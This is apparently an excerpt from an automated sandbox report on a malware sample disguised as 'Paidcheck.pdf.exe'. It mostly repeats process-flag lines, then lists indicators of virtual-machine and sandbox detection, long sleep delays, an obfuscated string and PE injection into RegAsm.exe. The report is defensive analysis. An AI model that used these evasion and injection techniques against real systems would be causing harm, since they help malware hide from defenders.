      Source: C:\Users\user\Desktop\Paidcheck.pdf.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Users\user\Desktop\Paidcheck.pdf.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Users\user\Desktop\Paidcheck.pdf.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Users\user\Desktop\Paidcheck.pdf.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Users\user\Desktop\Paidcheck.pdf.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Users\user\Desktop\Paidcheck.pdf.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Users\user\Desktop\Paidcheck.pdf.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\SysWOW64\wscript.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\SysWOW64\wscript.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\SysWOW64\wscript.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Users\user\AppData\Local\Temp\RegAsm.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Users\user\AppData\Local\Temp\RegAsm.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Users\user\AppData\Local\Temp\RegAsm.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Users\user\AppData\Local\Temp\RegAsm.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Users\user\AppData\Local\Temp\RegAsm.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Users\user\AppData\Local\Temp\RegAsm.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Users\user\AppData\Local\Temp\RegAsm.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Users\user\AppData\Local\Temp\RegAsm.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Users\user\AppData\Local\Temp\RegAsm.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Users\user\AppData\Local\Temp\RegAsm.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Users\user\AppData\Local\Temp\RegAsm.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Users\user\AppData\Local\Temp\RegAsm.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Users\user\AppData\Local\Temp\RegAsm.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Users\user\AppData\Local\Temp\RegAsm.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Users\user\AppData\Local\Temp\RegAsm.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Users\user\AppData\Local\Temp\RegAsm.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Users\user\AppData\Local\Temp\RegAsm.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Users\user\AppData\Local\Temp\RegAsm.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Users\user\AppData\Local\Temp\RegAsm.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Users\user\AppData\Local\Temp\RegAsm.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Users\user\AppData\Local\Temp\RegAsm.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Users\user\AppData\Local\Temp\RegAsm.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Users\user\AppData\Local\Temp\RegAsm.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Users\user\AppData\Local\Temp\RegAsm.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Users\user\AppData\Local\Temp\RegAsm.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Users\user\AppData\Local\Temp\RegAsm.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Users\user\AppData\Local\Temp\RegAsm.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Users\user\AppData\Local\Temp\RegAsm.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Users\user\AppData\Local\Temp\RegAsm.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Users\user\AppData\Local\Temp\RegAsm.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Users\user\AppData\Local\Temp\RegAsm.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Users\user\AppData\Local\Temp\RegAsm.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Users\user\AppData\Local\Temp\RegAsm.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Users\user\AppData\Local\Temp\RegAsm.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Users\user\AppData\Local\Temp\RegAsm.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Users\user\AppData\Local\Temp\RegAsm.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Users\user\AppData\Local\Temp\RegAsm.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Users\user\AppData\Local\Temp\RegAsm.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Users\user\AppData\Local\Temp\RegAsm.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Users\user\AppData\Local\Temp\RegAsm.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Users\user\AppData\Local\Temp\RegAsm.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Users\user\AppData\Local\Temp\RegAsm.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Users\user\AppData\Local\Temp\RegAsm.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Users\user\AppData\Local\Temp\RegAsm.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Users\user\AppData\Local\Temp\RegAsm.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Users\user\AppData\Local\Temp\RegAsm.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Users\user\AppData\Local\Temp\RegAsm.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Users\user\AppData\Local\Temp\RegAsm.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Users\user\AppData\Local\Temp\RegAsm.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Users\user\AppData\Local\Temp\RegAsm.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Program Files (x86)\DHCP Monitor\dhcpmon.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Program Files (x86)\DHCP Monitor\dhcpmon.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Program Files (x86)\DHCP Monitor\dhcpmon.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Program Files (x86)\DHCP Monitor\dhcpmon.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Program Files (x86)\DHCP Monitor\dhcpmon.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Program Files (x86)\DHCP Monitor\dhcpmon.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Program Files (x86)\DHCP Monitor\dhcpmon.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Program Files (x86)\DHCP Monitor\dhcpmon.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Program Files (x86)\DHCP Monitor\dhcpmon.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Program Files (x86)\DHCP Monitor\dhcpmon.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Program Files (x86)\DHCP Monitor\dhcpmon.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Program Files (x86)\DHCP Monitor\dhcpmon.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Program Files (x86)\DHCP Monitor\dhcpmon.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Program Files (x86)\DHCP Monitor\dhcpmon.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Program Files (x86)\DHCP Monitor\dhcpmon.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Program Files (x86)\DHCP Monitor\dhcpmon.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Program Files (x86)\DHCP Monitor\dhcpmon.exeProcess information set: NOOPENFILEERRORBOX

      Malware Analysis System Evasion:

      barindex
      Tries to detect sandboxes and other dynamic analysis tools (process name or module or function)Show sources
      Source: Paidcheck.pdf.exe, 00000000.00000002.306008181.0000000002CD5000.00000004.00000001.sdmpBinary or memory string: SBIEDLL.DLL0SELECT * FROM WIN32_BIOS8UNEXPECTED WMI QUERY FAILURE
      Source: C:\Users\user\Desktop\Paidcheck.pdf.exeThread delayed: delay time: 922337203685477
      Source: C:\Users\user\AppData\Local\Temp\RegAsm.exeThread delayed: delay time: 922337203685477
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
      Source: C:\Users\user\AppData\Local\Temp\RegAsm.exeThread delayed: delay time: 922337203685477
      Source: C:\Program Files (x86)\DHCP Monitor\dhcpmon.exeThread delayed: delay time: 922337203685477
      Source: C:\Program Files (x86)\DHCP Monitor\dhcpmon.exeThread delayed: delay time: 922337203685477
      Source: C:\Windows\SysWOW64\wscript.exeWindow found: window name: WSH-Timer
      Source: C:\Users\user\Desktop\Paidcheck.pdf.exeWindow / User API: threadDelayed 2166
      Source: C:\Users\user\AppData\Local\Temp\RegAsm.exeWindow / User API: threadDelayed 1995
      Source: C:\Users\user\AppData\Local\Temp\RegAsm.exeWindow / User API: threadDelayed 7581
      Source: C:\Users\user\AppData\Local\Temp\RegAsm.exeWindow / User API: foregroundWindowGot 420
      Source: C:\Users\user\AppData\Local\Temp\RegAsm.exeWindow / User API: foregroundWindowGot 504
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 3562
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 3681
      Source: C:\Users\user\Desktop\Paidcheck.pdf.exe TID: 2412Thread sleep time: -922337203685477s >= -30000s
      Source: C:\Users\user\AppData\Local\Temp\RegAsm.exe TID: 3360Thread sleep time: -21213755684765971s >= -30000s
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 3820Thread sleep time: -1844674407370954s >= -30000s
      Source: C:\Users\user\AppData\Local\Temp\RegAsm.exe TID: 5380Thread sleep time: -922337203685477s >= -30000s
      Source: C:\Program Files (x86)\DHCP Monitor\dhcpmon.exe TID: 1260Thread sleep time: -922337203685477s >= -30000s
      Source: C:\Program Files (x86)\DHCP Monitor\dhcpmon.exe TID: 5900Thread sleep time: -922337203685477s >= -30000s
      Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
      Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
      Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
      Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
      Source: C:\Users\user\Desktop\Paidcheck.pdf.exeThread delayed: delay time: 922337203685477
      Source: C:\Users\user\AppData\Local\Temp\RegAsm.exeThread delayed: delay time: 922337203685477
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
      Source: C:\Users\user\AppData\Local\Temp\RegAsm.exeThread delayed: delay time: 922337203685477
      Source: C:\Program Files (x86)\DHCP Monitor\dhcpmon.exeThread delayed: delay time: 922337203685477
      Source: C:\Program Files (x86)\DHCP Monitor\dhcpmon.exeThread delayed: delay time: 922337203685477
      Source: powershell.exe, 0000000B.00000003.399307837.000000000563E000.00000004.00000001.sdmpBinary or memory string: Hyper-V
      Source: Paidcheck.pdf.exe, 00000000.00000002.306008181.0000000002CD5000.00000004.00000001.sdmpBinary or memory string: 0VMware|VIRTUAL|A M I|XenDselect * from Win32_ComputerSystem
      Source: Paidcheck.pdf.exe, 00000000.00000002.306008181.0000000002CD5000.00000004.00000001.sdmpBinary or memory string: vmware
      Source: Paidcheck.pdf.exeBinary or memory string: 8xtufgFL9YSJTJhKurqTEQ4KHdRlcviru4FUtiXAAUnnOXunjt4Xvipp3nhZtWVo+r+hOi0xK\7O7OCaMW+CuwwYdEahHwAey+MLxaowRjPiaPwgAMJaIMKBGk69eJN8nHBHp8XVGKcVV4PdaO0mGxG/JEAr8ITBz3fEoXnlAkKObYKN\7XyeVNLZvMCiE8ZjgMRtjomvalJwoGzov7OAgrMeTy3CqTWunb/XDcypmS73RJjnzQJxs58+cgWyiqgecHR
      Source: Paidcheck.pdf.exe, 00000000.00000002.306008181.0000000002CD5000.00000004.00000001.sdmpBinary or memory string: model0Microsoft|VMWare|Virtual
      Source: wscript.exe, 00000009.00000002.307685747.0000000000E23000.00000004.00000020.sdmpBinary or memory string: \??\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#5&280b647&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}
      Source: RegAsm.exe, 0000000A.00000002.479021599.0000000000EC2000.00000004.00000020.sdmpBinary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll
      Source: powershell.exe, 0000000B.00000003.399307837.000000000563E000.00000004.00000001.sdmpBinary or memory string: l:C:\Windows\system32\WindowsPowerShell\v1.0\Modules\Hyper-V
      Source: C:\Users\user\Desktop\Paidcheck.pdf.exeProcess information queried: ProcessInformation
      Source: C:\Users\user\Desktop\Paidcheck.pdf.exeProcess token adjusted: Debug
      Source: C:\Users\user\AppData\Local\Temp\RegAsm.exeProcess token adjusted: Debug
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess token adjusted: Debug
      Source: C:\Users\user\Desktop\Paidcheck.pdf.exeMemory allocated: page read and write | page guard

      HIPS / PFW / Operating System Protection Evasion:

      barindex
      Injects a PE file into a foreign processesShow sources
      Source: C:\Users\user\Desktop\Paidcheck.pdf.exeMemory written: C:\Users\user\AppData\Local\Temp\RegAsm.exe base: 400000 value starts with: 4D5A
      Writes to foreign memory regionsShow sources
      Source: C:\Users\user\Desktop\Paidcheck.pdf.exeMemory written: C:\Users\user\AppData\Local\Temp\RegAsm.exe base: 400000
      Source: C:\Users\user\Desktop\Paidcheck.pdf.exeMemory written: C:\Users\user\AppData\Local\Temp\RegAsm.exe base: 402000
      Source: C:\Users\user\Desktop\Paidcheck.pdf.exeMemory written: C:\Users\user\AppData\Local\Temp\RegAsm.exe base: 420000
      Source: C:\Users\user\Desktop\Paidcheck.pdf.exeMemory written: C:\Users\user\AppData\Local\Temp\RegAsm.exe base: 422000
      Source: C:\Users\user\Desktop\Paidcheck.pdf.exeMemory written: C:\Users\user\AppData\Local\Temp\RegAsm.exe base: 829008
